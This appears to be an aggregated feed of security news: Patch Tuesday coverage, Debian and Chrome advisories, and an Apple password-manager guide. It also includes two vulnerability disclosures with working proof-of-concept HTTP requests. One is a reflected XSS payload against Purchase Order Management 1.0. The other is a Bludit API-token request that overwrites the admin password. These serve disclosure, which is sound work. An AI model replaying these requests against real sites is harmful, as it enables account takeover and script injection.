Purchase Order Management v1.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the password parameter at /purchase_order/classes/login.php.

The value of the password request parameter is copied into the HTML document as plain text between tags. The payload uay4ws4m6g was submitted in the password parameter. This input was echoed unmodified in the application's response.

    POST /purchase_order/classes/Login.php?f=login HTTP/1.1
    Host: localhost
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en-US;q=0.9,en;q=0.8
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36
    Connection: close
    Cache-Control: max-age=0
    Cookie: PHPSESSID=83loqso6i0hee5lpfufibf68o5
    Origin: http://localhost
    X-Requested-With: XMLHttpRequest
    Referer: http://localhost/purchase_order/admin/login.php
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="110", "Chromium";v="110"
    Sec-CH-UA-Platform: Windows
    Sec-CH-UA-Mobile: ?0
    Content-Length: 37
    
    username=gAjjuMUL&password=k8Z!h2w!V7uay4w%3cimg%20src%3da%20onerror%3dalert(1)%3es4m6g

CVE-2023-29623: CVE-nu11secur1ty/vendors/oretnom23/2023/Purchase-Order-Management-1.0/XSS-Reflected at main · nu11secur1ty/CVE-nu11secur1ty

Debian Linux Security Advisory 5386-1 - Multiple security issues were discovered in Chromium, which could result in the execution of arbitrary code, denial of service or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5386-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffApril 12, 2023                        https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2023-1810 CVE-2023-1811 CVE-2023-1812 CVE-2023-1813                 CVE-2023-1814 CVE-2023-1815 CVE-2023-1816 CVE-2023-1817                 CVE-2023-1818 CVE-2023-1819 CVE-2023-1820 CVE-2023-1821                 CVE-2023-1822 CVE-2023-1823Multiple security issues were discovered in Chromium, which could resultin the execution of arbitrary code, denial of service or informationdisclosure.For the stable distribution (bullseye), these problems have been fixed inversion 112.0.5615.49-2~deb11u2.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmQ27IkACgkQEMKTtsN8TjZJnRAAmqQ2oitZ8Xe6N7LFmTq9sADGRMIpupykpRNnPRItA6tVGyDK/yfZnURzD3PTe3uvNx+W8GY+cam3PVjVrPBOXBIga+0NX7krtrs/yIsdKPw0M5EuMiAIl/zwAdoPb8joxdgXMcdDU778iGrx7F0U8/L2cznVSxPP/KZLdEVu35ZoIPxNmH1AmOI91qWoraFdCbLutmtqwTDBwbq+Mk2uzGLlYAhhjEettIArw61unBpi6fMWoCDRSRvIHdXpQWya6WN0MfrUWgtWtQCoqIjyixCOhGVOxYoDrVzJNFDfKZ50eHCwwQxFQPTeK4xk4XBqrh7FnByEAURtZ9dgn3jRdAKZbKsaRQcCYRtGRkbllYD6jYoRTAru+L6b5BKiOL2HZ9Degy53JLNbc92yHpUMnn8oX3AKJM/GKmd053DJkLBP4eVfjh+EyR5cdI4m/pl8zhhQCqt9f7iKoCQPeJe2egMDVg0+Jf1o4oP5117sazBTmsx5yNcsBKHa4jhCUcNxan+7BeRM11edcKkNLDlq/YNC7+ZsqqR6Fps1/rLTgQ0L0LqW2OuEfKfUrfOd9B4G/uWHlYzQepxLy+AcUYnoCekFBHZJ+jtlkwVQ2PBgJ7crSGSWrbfjq0M1NSb9iOlchyINbnvkY3s+YDU0IZcOJqt5lNCrQ0paysYt/+pv994=9/cQ-----END PGP SIGNATURE-----

Debian Security Advisory 5386-1

Categories: Exploits and vulnerabilities
Categories: News
Tags: Microsoft

Tags:  Apple

Tags:  Google

Tags:  Adobe

Tags:  Cisco

Tags:  SAP

Tags:  Mozilla

Tags:  CVE-2023-28252

Tags:  CVE-2023-28231

Tags:  CVE-2023-21554

Tags:  Word

Tags:  Publisher

Tags:  Office

One fixed vulnerability is being actively exploited by a ransomware gang and many others were fixed in this month's Patch Tuesday updates.



(Read more...)




The post Update now! April’s Patch Tuesday includes a fix for one zero-day appeared first on Malwarebytes Labs.

Posted: April 12, 2023 by

It’s Patch Tuesday again. Microsoft and other vendors have released their monthly updates. Among a total of 97 patched vulnerabilities there is one actively exploited zero-day.

Microsoft classifies a vulnerability as a zero-day if it is publicly disclosed or actively exploited with no official fix available. The Common Vulnerabilities and Exposures (CVE) database lists publicly disclosed computer security flaws. The actively exploited zero day is listed as CVE-2023-28252.

CVE-2023-28252 is an elevation of privilege (EoP) vulnerability in the Windows Common Log File System (CLFS) driver. An attacker who successfully exploited this vulnerability could gain SYSTEM privileges, which is the highest level of privilege on Windows systems. This is the type of vulnerability that we can expect to see chained with other vulnerabilities. Once an attacker has access, EoP vulnerabilities allow them to exploit that access to the fullest.

CISA has already added the CVE-2023-28252 Windows zero-day to its catalog of Known Exploited Vulnerabilities, which means federal (FCEB) agencies have until May 2, 2023 to patch against it.

Given the reach and simplicity of exploitation, this vulnerability is bound to be very popular among cybercriminals, and so it should be patched as soon as possible. CLFS is present in all Windows versions and so is the vulnerability. Exploitation does not require any user interaction and the vulnerability is already in use by at least one ransomware gang.

Another vulnerability to keep an eye on is CVE-2023-28231, a DHCP Server Service remote code execution (RCE) vulnerability. It is rated as critical with a CVSS score of 8.8 out of 10. Even though the attacker would need access to the network to successfully exploit this vulnerability, Microsoft has it listed as “Exploitation more likely.”

Another one that Microsoft deems more likely to be exploited is CVE-2023-21554, an RCE vulnerability in Microsoft Message Queuing (MSMQ) with a CVSS score of 9.8 out of 10. To exploit this vulnerability, an attacker would need to send a specially crafted malicious MSMQ packet to a MSMQ server. This could result in remote code execution on the server side.

A few others we can expect to see, especially in the form of email attachments, are several RCE vulnerabilities in Microsoft Office, Word, and Publisher \[2\]. All these vulnerabilities require the user to open a malicious file. So this is something we can typically expect to see a lot in phishing campaigns.

**Other vendors**

Other vendors have synchronized their periodic updates with Microsoft. Here are few major ones that you may find in your environment.

Adobe has released security updates for several products:

*   Digital Editions
*   InCopy 
*   Acrobat and Reader
*   Substance 3D Stager
*   Dimension 
*   Substance 3D Designer

Apple released emergency updates for two known-to-be-exploited vulnerabilities.

Cisco released security updates for multiple products.

Google has released updates for the Chrome browser and for Android.

Mozilla has released security advisories for vulnerabilities affecting multiple Mozilla products:

*   Firefox 112, Firefox for Android 112, Focus for Android 112
*   Firefox ESR 102.10
*   Thunderbird 102.10

SAP has released its April 2023 updates.

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

**RELATED ARTICLES**

Update now! April’s Patch Tuesday includes a fix for one zero-day

It's the second Tuesday of the month, and Microsoft has released another set of security updates to fix a total of 97 flaws impacting its software, one of which has been actively exploited in ransomware attacks in the wild.
Seven of the 97 bugs are rated Critical and 90 are rated Important in severity. Interestingly, 45 of the shortcomings are remote code execution flaws, followed by 20

Patch Tuesday / Software Updates

It's the second Tuesday of the month, and Microsoft has released another set of security updates to fix a total of 97 flaws impacting its software, one of which has been actively exploited in ransomware attacks in the wild.

Seven of the 97 bugs are rated Critical and 90 are rated Important in severity. Interestingly, 45 of the shortcomings are remote code execution flaws, followed by 20 elevation of privilege vulnerabilities. The updates also follow fixes for 26 vulnerabilities in its Edge browser that were released over the past month.

The security flaw that's come under active exploitation is CVE-2023-28252 (CVSS score: 7.8), a privilege escalation bug in the Windows Common Log File System (CLFS) Driver.

"An attacker who successfully exploited this vulnerability could gain SYSTEM privileges," Microsoft said in an advisory, crediting researchers Boris Larin, Genwei Jiang, and Quan Jin for reporting the issue.

CVE-2023-28252 is the fourth privilege escalation flaw in the CLFS component that has come under active abuse in the past year alone after CVE-2022-24521, CVE-2022-37969, and CVE-2023-23376 (CVSS scores: 7.8). At least 32 vulnerabilities have been identified in CLFS since 2018.

According to Russian cybersecurity firm Kaspersky, the vulnerability has been weaponized by a cybercrime group to deploy Nokoyawa ransomware against small and medium-sized businesses in the Middle East, North America, and Asia.

"CVE-2023-28252 is an out-of-bounds write (increment) vulnerability that can be exploited when the system attempts to extend the metadata block," Larin said. "The vulnerability gets triggered by the manipulation of the base log file."

In light of ongoing exploitation of the flaw, CISA added the Windows zero-day to its catalog of Known Exploited Vulnerabilities (KEV), ordering Federal Civilian Executive Branch (FCEB) agencies to secure their systems by May 2, 2023.

Also patched are critical remote code execution flaws impacting DHCP Server Service, Layer 2 Tunneling Protocol, Raw Image Extension, Windows Point-to-Point Tunneling Protocol, Windows Pragmatic General Multicast, and Microsoft Message Queuing (MSMQ).

The MSMQ bug, tracked as CVE-2023-21554 (CVSS score: 9.8) and dubbed QueueJumper by Check Point, could lead to unauthorized code execution and take over a server by sending a specially crafted malicious MSMQ packet to an MSMQ server.

"The CVE-2023-21554 vulnerability allows an attacker to potentially execute code remotely and without authorization by reaching the TCP port 1801," Check Point researcher Haifei Li said. "In other words, an attacker could gain control of the process through just one packet to the 1801/tcp port with the exploit, triggering the vulnerability."

Two other flaws discovered in MSMQ, CVE-2023-21769 and CVE-2023-28302 (CVSS scores: 7.5), could be exploited to cause a denial-of-service (DoS) condition such as a service crash and Windows Blue Screen of Death (BSoD).

UPCOMING WEBINAR

Learn to Secure the Identity Perimeter - Proven Strategies

Improve your business security with our upcoming expert-led cybersecurity webinar: Explore Identity Perimeter strategies!

Don't Miss Out – Save Your Seat!

Microsoft has also updated its advisory for CVE-2013-3900, a WinVerifyTrust signature validation vulnerability, to include the following Server Core installation versions -

*   Windows Server 2008 for 32-bit Systems Service Pack 2
*   Windows Server 2008 for x65-based Systems Service Pack 2
*   Windows Server 2008 R2 for x64-based Systems Service 1
*   Windows Server 2012
*   Windows Server 2012 R2
*   Windows Server 2016
*   Windows Server 2019, and
*   Windows Server 2022

The development comes as North Korea-linked threat actors have been observed leveraging the flaw to incorporate encrypted shellcode into legitimate libraries without invalidating the Microsoft-issued signature.

**Software Patches from Other Vendors**

In addition to Microsoft, security updates have also been released by other vendors in the last few weeks to rectify several vulnerabilities, including —

*   Adobe
*   AMD
*   Android
*   Apache Projects
*   Apple
*   Arm
*   Aruba Networks
*   Cisco
*   Citrix
*   CODESYS
*   Dell
*   Drupal
*   F5
*   Fortinet
*   GitLab
*   Google Chrome
*   HP
*   IBM
*   Jenkins
*   Juniper Networks
*   Lenovo
*   Linux distributions Debian, Oracle Linux, Red Hat, SUSE, and Ubuntu
*   MediaTek
*   Mozilla Firefox, Firefox ESR, and Thunderbird
*   NETGEAR
*   NVIDIA
*   Palo Alto Networks
*   Qualcomm
*   Samba
*   Samsung
*   SAP
*   Schneider Electric
*   Siemens
*   SonicWall, and
*   Sophos

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Urgent: Microsoft Issues Patches for 97 Flaws, Including Active Ransomware Exploit

Microsoft Edge (Chromium-based) Spoofing Vulnerability

CVE-2023-24935

Microsoft Edge (Chromium-based) Tampering Vulnerability

CVE-2023-28301

Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability

CVE-2023-28284

Fatal OOM/crash of Chrome browser while detaching/attaching tabs on macOS.

Title: Google Chrome Browser 111.0.5563.64 AXPlatformNodeCocoa Fatal OOM/Crash (macOS)  
Advisory ID: ZSL-2023-5770  
Type: Local  
Impact: DoS  
Risk: (3/5)  
Release Date: 11.04.2023

**Summary**

Google Chrome browser is a free web browser used for accessing the internet and running web-based applications. The Google Chrome browser is based on the open source Chromium web browser project. Google released Chrome in 2008 and issues several updates a year.

**Description**

Fatal OOM/crash of Chrome browser while detaching/attaching tabs on macOS.

**Vendor**

Google LLC - https://www.google.com

**Affected Version**

111.0.5563.64 (Official Build) (x86\_64)  
110.0.5481.100 (Official Build) (x86\_64)  
108.0.5359.124 (Official Build) (x86\_64)  
108.0.5359.98 (Official Build) (x86\_64)

**Tested On**

macOS 12.6.1 (Monterey)  
macOS 13.3.1 (Ventura)

**Vendor Status**

\[08.12.2022\] Vulnerability discovered.  
\[13.12.2022\] Contact with the vendor, ticket 1400682 created.  
\[13.12.2022\] Vendor begins investigation.  
\[10.04.2023\] Vendor releases version 112.0.5615.49 to address this issue.  
\[11.04.2023\] Public security advisory released.

**PoC**

google\_chrome\_oom.txt

**Credits**

Vulnerability discovered by Gjoko Krstic - <gjoko@zeroscience.mk\>

**References**

\[1\] https://bugs.chromium.org/p/chromium/issues/detail?id=1400682  
\[2\] https://chromium-review.googlesource.com/c/chromium/src/+/3861171

**Changelog**

\[11.04.2023\] - Initial release

**Contact**

Zero Science Lab

Web: https://www.zeroscience.mk  
e-mail: lab@zeroscience.mk

Google Chrome Browser 111.0.5563.64 AXPlatformNodeCocoa Fatal OOM/Crash (macOS)

Bludit version 4.0.0-rc-2 suffers from an account takeover vulnerability due to an API key that can be abused to change the administrative password.

    ## Title: Bludit-4.0.0-rc-2 - Release candidate 2 Account takeover:API token vulnerability## Author: nu11secur1ty## Date: 04.11.2013## Vendor: https://www.bludit.com/## Software: https://github.com/bludit/bludit/releases/tag/4.0.0-rc-2## Reference: https://www.cloudflare.com/learning/access-management/account-takeover/## Reference: https://portswigger.net/daily-swig/facebook-account-takeover-researcher-scoops-40k-bug-bounty-for-chained-exploit## Description:The already authenticated attacker can send a normal request to changehis password and then he can usethe same JSON `object` and the vulnerable `API token KEY` in the samerequest to change the admin account password.Then he can access the admin account and he can do very malicious stuff.STATUS: HIGH Vulnerability[+]Exploit:```PUTPUT /api/users/admin HTTP/1.1Host: 127.0.0.1:8000Content-Length: 138sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.50Safari/537.36content-type: application/jsonAccept: */*Origin: http://127.0.0.1:8000Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://127.0.0.1:8000/admin/edit-user/pwnedAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: BLUDIT-KEY=98t31p2g0i7t6rscufuccpthuiConnection: close{"token":"4f8df9f64e84fa4562ec3a604bf7985c","authentication":"6d1a5510a53f9d89325b0cd56a2855a9","username":"pwned","password":"password1"}```[+]Response:```HTTPHTTP/1.1 200 OKHost: 127.0.0.1:8000Date: Tue, 11 Apr 2023 08:33:51 GMTConnection: closeX-Powered-By: PHP/7.4.30Access-Control-Allow-Origin: *Content-Type: application/json{"status":"0","message":"User edited.","data":{"key":"admin"}}```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/bludit/2023/Bludit-v4.0.0-Release-candidate-2)## Proof and Exploit:[href](https://streamable.com/w3aa4d)## Time spend:00:57:00

Bludit 4.0.0-rc-2 Privilege Escalation

Your iPhone, iPad, and Mac now have a built-in password feature, complete with two-factor authentication.

Most people don't use a password manager or two-factor authentication—even people who know it's a good idea—because installing and managing _yet another app_ just sounds exhausting. Well, if you're an Apple user, you don't need another app anymore: Your device can manage your passwords and generate two-factor authentication codes for you, and you can even sync them with a Windows computer.

Password managers are important. Why? To quickly summarize, using the same password for every website and app is an open invitation for hackers to access all of your accounts. That's because passwords regularly leak, and a leaked password on one site can give hackers access to all your other accounts if you use the same password everywhere. It's best, then, to use a totally different password on every site, but no human being can remember that many passwords.

Password managers are the best solution we have at the moment, because they can generate, and then store, secure passwords for all of your services. Most people don't use one, though, because such apps can be complicated to learn, and the best ones aren't free.

So it's great that Apple offers such functionality. But there's a downside: It's a little buried, if not outright hidden. Still, if you're a Safari user with multiple Apple devices, this feature means you can quickly generate and save secure passwords for all of your accounts. Here's how. Note that you'll need a (free) iCloud account for this service to sync passwords between devices, though if you're an Apple user you almost certainly already have one.

Create Passwords

To get started, you may need to enable the feature, which you can find in System Settings on your device under **Passwords**. Make sure **iCloud Keychain** is turned on. Windows users should also install iCloud for Windows, which can sync your passwords with Chrome or Microsoft Edge.

The simplest way to add passwords to Apple's hidden password manager is to just start using your devices and saving passwords as you go. When you sign into any online account in Safari, or in any app on your iPhone or iPad, there's generally a pop-up asking if you want to save the password in your **iCloud Keychain for AutoFill.** This is the simplest way to add accounts: Just hit the **Save Password** button and your username and password will be saved.

Alternatively, if you're signing up for a new account, you will generally be offered an automatically generated strong password—if not, you can tap the key icon at the top of the keyboard on mobile or in the right side of the password field on desktop. Either way you should see the **Add New Password** option, which can automatically create a strong password for you.

From now on, when you log in to the site, your device will offer to fill out the username and password for you. It will generally use TouchID, FaceID, or your system password to confirm you identity, after which the username and password field will be filled in. This saves you from having to remember the passwords, and even the usernames, you use to log in to websites.

Browse and Edit Your Passwords

You might be wondering _where_, exactly, all of these passwords are saved. Let's head back to **Passwords** in System Settings. Here you will find a list of all the passwords you've saved.

Apple via Justin Pot

At the top of the list is a **Security Recommendations** function, which will cross-reference your saved passwords with known lists of leaked accounts. This is a useful way to know if any of your passwords absolutely need to be changed.

Below that is a search bar, which you can use to quickly find any account. Open an account to see the username, password, and URLs associated with the account. You can also add a note to any account, if you want.

Two-Factor Authentication

We've talked about how two-factor authentication keeps you more secure, but basically it means that a hacker who gets your password won't be able to log in unless they _also_ have physical access to your device. Generally two-factor authentication requires installing _yet another_ app, for generating codes, but Apple devices have this feature built in, and they can even fill in the field for you.

Head back to your list of passwords in the System Settings app. Open any account and you'll see a **Set Up Verification Code** field.

Apple via Justin Pot

Tap this and you can set up two-factor authentication for the application. How to do this depends on the specific service you're setting it up for, but it's generally in the settings of the specific app or website. You'll have a QR code to sign or, alternatively, a long code to copy.

Apple via Justin Pot

After setting this up, your Apple device will automatically offer verification codes for you every time you log in to the service on any of your devices. It's really slick, and it's a lot faster than applications like Authy or Google Authenticator.

Importing and Exporting Passwords

Note that if you have an existing password manager, you can import your passwords to Apple's system. Head back to **Passwords** in the settings app and hit the three-dot button on the right above your list of passwords. Here you will see the option to **Import passwords**.

Apple via Justin Pot

You will need to export your passwords to a CSV file before you can use this functionality. Here are instructions for the leading password managers:

*   1Password
*   LastPass
*   Bitwarden
*   Dashlane
*   Google Chrome

You can also **Export** your Apple passwords to a CSV file from here, allowing you to import them into one of these password managers. We've outlined  the best password managers for you; my personal recommendations are Bitwarden, which is free and open source, and 1Password, which is powerful and free to use.

There's not a lot of reason for the Apple faithful to do this, though. As we've outlined, Apple's password system does most of what these applications can do. The main problem is that they're hidden. 

Recently the blogger Cabel Sasser argued that Apple Passwords needs an app, which is part of why I wrote this guide. I'm not sure if I agree with his premise—I suspect most people would simply ignore any “Passwords” app, the way they ignore most applications that come bundled with their devices. Still, it is true that all of this functionality is pretty buried. I hope this article helps you find it.

Tag

#chrome